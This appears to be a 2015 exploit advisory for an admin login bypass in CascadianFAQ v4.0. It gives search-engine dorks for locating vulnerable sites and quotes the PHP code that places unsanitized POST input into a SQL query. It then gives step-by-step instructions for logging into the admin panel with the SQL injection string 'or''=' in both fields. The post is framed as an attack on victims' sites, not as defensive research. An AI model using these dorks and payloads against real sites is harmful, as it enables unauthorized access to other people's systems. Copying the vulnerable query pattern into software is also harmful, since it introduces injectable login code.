facebook facebook twitter rss

CascadianFAQ v4.0 (Admin Login Bypass)

Author: Sniper Pex , Published: 06-04-2015
######################################
- Exploit Title: CascadianFAQ v4.0 (Admin Login Bypass)
- Found By: Sniper Pex
- From: Team Wolf Morrocan
- City: Marrakech , Morocco
- Tested On: Winxp SP3
######################################

.::Infos To Find Vulnerable Sites::.
##########################################
-Dorks:
1: intitle:"My FAQ" & inurl:"/index.php"
2: intext:"This FAQ is powered by CascadianFAQ v4.1, developed by Summer S. Wilson at Eclectic Designs."
3: USE Your Mind
##############################################

.::Exploit File Error {admin.php}::.
################################################
Line "66 => 71"
$uservalue = $_POST['uservalue'];
$password = $_POST['password'];
$checkquery = "Select username, firstname, lastname, email, accesslevel FROM cfaq_admin WHERE username = '$uservalue' AND password = '$password'";
$results = run_my_query( $checkquery, "Error checking username against database");
$num_rows = get_num_rows( $results );
#####################################################

.::Exploit / P0c::.
#####################################################
- You Can Login In The Admin Panel Without Pass & User
Good:
1: Find The Site
2: Add In The Target "admin.php"
3: Exemple: http://victim/path/admin.php
4: See The Login InputBox
5: In User Set 'or''=' And In Password Set 'or''='
6: Gooood By
########################################################

.::Contact Me::.
#######################################
Email: Wassline@gmail.com
Facebook: http://fb.com/nassime.asrir
#########################################

.::Greetz To::.
#################################################################
Allah & All Arabian Muslims Hacker & My Friend Moroccan Red Light
Wgaaaaaaaaaaaaa3 Wlad Lmaghrib Wlad Marrakech L3zzz
#################################################################

Like us on Facebook :